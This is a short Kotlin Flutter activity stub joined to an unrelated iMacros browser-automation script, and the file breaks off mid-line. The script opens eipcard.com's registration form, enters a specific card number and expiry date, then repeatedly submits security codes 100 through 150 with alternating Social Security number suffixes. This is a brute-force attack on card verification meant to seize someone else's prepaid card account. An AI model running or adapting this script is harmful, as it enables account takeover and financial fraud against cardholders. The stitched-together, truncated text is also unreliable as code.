package com.jadebyte.paymentcardvalidation

import io.flutter.embedding.android.FlutterActivity

class MainActivity : FlutterActivity()
VERSION BUILD=1011 RECORDER=CR

URL GOTO=https://www.eipcard.com/

TAG POS=1 TYPE=BUTTON ATTR=TXT:Login

TAG POS=1 TYPE=A ATTR=TXT:Register<SP>Now

SET !ENCRYPTION NO

TAG POS=1 TYPE=INPUT:PASSWORD FORM=NAME:registrationForm ATTR=ID:cardNumber CONTENT=4635053509912543

TAG POS=1 TYPE=SELECT FORM=NAME:registrationForm ATTR=ID:expirationDate CONTENT=%12

TAG POS=1 TYPE=SELECT FORM=NAME:registrationForm ATTR=NAME:giftCardExpYear CONTENT=%2025

TAG POS=1 TYPE=INPUT:IMAGE FORM=NAME:registrationForm ATTR=ID:continue-button

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:securitycode CONTENT=100

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:ssnSuf CONTENT=9561

TAG POS=1 TYPE=INPUT:IMAGE FORM=NAME:registrationForm ATTR=ID:continue-button

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:securitycode CONTENT=102

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:ssnSuf CONTENT=9651

TAG POS=1 TYPE=INPUT:IMAGE FORM=NAME:registrationForm ATTR=ID:continue-button

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:securitycode CONTENT=103

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:ssnSuf CONTENT=9561

TAG POS=1 TYPE=INPUT:IMAGE FORM=NAME:registrationForm ATTR=ID:continue-button

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:securitycode CONTENT=104

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:ssnSuf CONTENT=9651

TAG POS=1 TYPE=INPUT:IMAGE FORM=NAME:registrationForm ATTR=ID:continue-button

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:securitycode CONTENT=105

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:ssnSuf CONTENT=9561

TAG POS=1 TYPE=INPUT:IMAGE FORM=NAME:registrationForm ATTR=ID:continue-button

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:securitycode CONTENT=106

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:ssnSuf CONTENT=9651

TAG POS=1 TYPE=INPUT:IMAGE FORM=NAME:registrationForm ATTR=ID:continue-button

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:securitycode CONTENT=107

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:ssnSuf CONTENT=9561

TAG POS=1 TYPE=INPUT:IMAGE FORM=NAME:registrationForm ATTR=ID:continue-button

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:securitycode CONTENT=108

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:ssnSuf CONTENT=9651

TAG POS=1 TYPE=INPUT:IMAGE FORM=NAME:registrationForm ATTR=ID:continue-button

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:securitycode CONTENT=109

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:ssnSuf CONTENT=9561

TAG POS=1 TYPE=INPUT:IMAGE FORM=NAME:registrationForm ATTR=ID:continue-button

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:securitycode CONTENT=110

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:ssnSuf CONTENT=9651

TAG POS=1 TYPE=INPUT:IMAGE FORM=NAME:registrationForm ATTR=ID:continue-button

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:securitycode CONTENT=111

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:ssnSuf CONTENT=9561

TAG POS=1 TYPE=INPUT:IMAGE FORM=NAME:registrationForm ATTR=ID:continue-button

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:securitycode CONTENT=112

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:ssnSuf CONTENT=9651

TAG POS=1 TYPE=INPUT:IMAGE FORM=NAME:registrationForm ATTR=ID:continue-button

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:securitycode CONTENT=113

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:ssnSuf CONTENT=9561

TAG POS=1 TYPE=INPUT:IMAGE FORM=NAME:registrationForm ATTR=ID:continue-button

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:securitycode CONTENT=114

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:ssnSuf CONTENT=9651

TAG POS=1 TYPE=INPUT:IMAGE FORM=NAME:registrationForm ATTR=ID:continue-button

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:securitycode CONTENT=115

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:ssnSuf CONTENT=9561

TAG POS=1 TYPE=INPUT:IMAGE FORM=NAME:registrationForm ATTR=ID:continue-button

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:securitycode CONTENT=116

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:ssnSuf CONTENT=9651

TAG POS=1 TYPE=INPUT:IMAGE FORM=NAME:registrationForm ATTR=ID:continue-button

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:securitycode CONTENT=117

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:ssnSuf CONTENT=9561

TAG POS=1 TYPE=INPUT:IMAGE FORM=NAME:registrationForm ATTR=ID:continue-button

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:securitycode CONTENT=118

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:ssnSuf CONTENT=9651

TAG POS=1 TYPE=INPUT:IMAGE FORM=NAME:registrationForm ATTR=ID:continue-button

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:securitycode CONTENT=119

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:ssnSuf CONTENT=9561

TAG POS=1 TYPE=INPUT:IMAGE FORM=NAME:registrationForm ATTR=ID:continue-button

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:securitycode CONTENT=120

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:ssnSuf CONTENT=9651

TAG POS=1 TYPE=INPUT:IMAGE FORM=NAME:registrationForm ATTR=ID:continue-button

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:securitycode CONTENT=121

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:ssnSuf CONTENT=9561

TAG POS=1 TYPE=INPUT:IMAGE FORM=NAME:registrationForm ATTR=ID:continue-button

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:securitycode CONTENT=122

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:ssnSuf CONTENT=9651

TAG POS=1 TYPE=INPUT:IMAGE FORM=NAME:registrationForm ATTR=ID:continue-button

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:securitycode CONTENT=123

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:ssnSuf CONTENT=9561

TAG POS=1 TYPE=INPUT:IMAGE FORM=NAME:registrationForm ATTR=ID:continue-button

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:securitycode CONTENT=124

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:ssnSuf CONTENT=9651

TAG POS=1 TYPE=INPUT:IMAGE FORM=NAME:registrationForm ATTR=ID:continue-button

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:securitycode CONTENT=125

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:ssnSuf CONTENT=9561

TAG POS=1 TYPE=INPUT:IMAGE FORM=NAME:registrationForm ATTR=ID:continue-button

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:securitycode CONTENT=126

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:ssnSuf CONTENT=9651

TAG POS=1 TYPE=INPUT:IMAGE FORM=NAME:registrationForm ATTR=ID:continue-button

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:securitycode CONTENT=127

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:ssnSuf CONTENT=9561

TAG POS=1 TYPE=INPUT:IMAGE FORM=NAME:registrationForm ATTR=ID:continue-button

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:securitycode CONTENT=128

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:ssnSuf CONTENT=9651

TAG POS=1 TYPE=INPUT:IMAGE FORM=NAME:registrationForm ATTR=ID:continue-button

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:securitycode CONTENT=129

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:ssnSuf CONTENT=9561

TAG POS=1 TYPE=INPUT:IMAGE FORM=NAME:registrationForm ATTR=ID:continue-button

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:securitycode CONTENT=130

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:ssnSuf CONTENT=9651

TAG POS=1 TYPE=INPUT:IMAGE FORM=NAME:registrationForm ATTR=ID:continue-button

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:securitycode CONTENT=131

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:ssnSuf CONTENT=9561

TAG POS=1 TYPE=INPUT:IMAGE FORM=NAME:registrationForm ATTR=ID:continue-button

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:securitycode CONTENT=132

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:ssnSuf CONTENT=9651

TAG POS=1 TYPE=INPUT:IMAGE FORM=NAME:registrationForm ATTR=ID:continue-button

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:securitycode CONTENT=133

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:ssnSuf CONTENT=9561

TAG POS=1 TYPE=INPUT:IMAGE FORM=NAME:registrationForm ATTR=ID:continue-button

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:securitycode CONTENT=134

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:ssnSuf CONTENT=9651

TAG POS=1 TYPE=INPUT:IMAGE FORM=NAME:registrationForm ATTR=ID:continue-button

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:securitycode CONTENT=135

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:ssnSuf CONTENT=9561

TAG POS=1 TYPE=INPUT:IMAGE FORM=NAME:registrationForm ATTR=ID:continue-button

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:securitycode CONTENT=136

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:ssnSuf CONTENT=9651

TAG POS=1 TYPE=INPUT:IMAGE FORM=NAME:registrationForm ATTR=ID:continue-button

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:securitycode CONTENT=137

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:ssnSuf CONTENT=9561

TAG POS=1 TYPE=INPUT:IMAGE FORM=NAME:registrationForm ATTR=ID:continue-button

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:securitycode CONTENT=138

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:ssnSuf CONTENT=9651

TAG POS=1 TYPE=INPUT:IMAGE FORM=NAME:registrationForm ATTR=ID:continue-button

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:securitycode CONTENT=139

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:ssnSuf CONTENT=9561

TAG POS=1 TYPE=INPUT:IMAGE FORM=NAME:registrationForm ATTR=ID:continue-button

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:securitycode CONTENT=140

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:ssnSuf CONTENT=9651

TAG POS=1 TYPE=INPUT:IMAGE FORM=NAME:registrationForm ATTR=ID:continue-button

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:securitycode CONTENT=141

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:ssnSuf CONTENT=9561

TAG POS=1 TYPE=INPUT:IMAGE FORM=NAME:registrationForm ATTR=ID:continue-button

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:securitycode CONTENT=142

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:ssnSuf CONTENT=9651

TAG POS=1 TYPE=INPUT:IMAGE FORM=NAME:registrationForm ATTR=ID:continue-button

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:securitycode CONTENT=143

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:ssnSuf CONTENT=9561

TAG POS=1 TYPE=INPUT:IMAGE FORM=NAME:registrationForm ATTR=ID:continue-button

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:securitycode CONTENT=144

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:ssnSuf CONTENT=9651

TAG POS=1 TYPE=INPUT:IMAGE FORM=NAME:registrationForm ATTR=ID:continue-button

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:securitycode CONTENT=145

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:ssnSuf CONTENT=9561

TAG POS=1 TYPE=INPUT:IMAGE FORM=NAME:registrationForm ATTR=ID:continue-button

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:securitycode CONTENT=146

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:ssnSuf CONTENT=9651

TAG POS=1 TYPE=INPUT:IMAGE FORM=NAME:registrationForm ATTR=ID:continue-button

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:securitycode CONTENT=147

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:ssnSuf CONTENT=9561

TAG POS=1 TYPE=INPUT:IMAGE FORM=NAME:registrationForm ATTR=ID:continue-button

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:securitycode CONTENT=148

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:ssnSuf CONTENT=9651

TAG POS=1 TYPE=INPUT:IMAGE FORM=NAME:registrationForm ATTR=ID:continue-button

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:securitycode CONTENT=149

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:ssnSuf CONTENT=9561

TAG POS=1 TYPE=INPUT:IMAGE FORM=NAME:registrationForm ATTR=ID:continue-button

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:securitycode CONTENT=150

TAG POS=1 TYPE=INPUT:TEXT FORM=NAME:registrationForm ATTR=ID:ssnSuf CONTENT=9651

TAG POS=1 TYPE=INPUT:IMAGE FORM=NAME:registrationForm ATTR=ID:
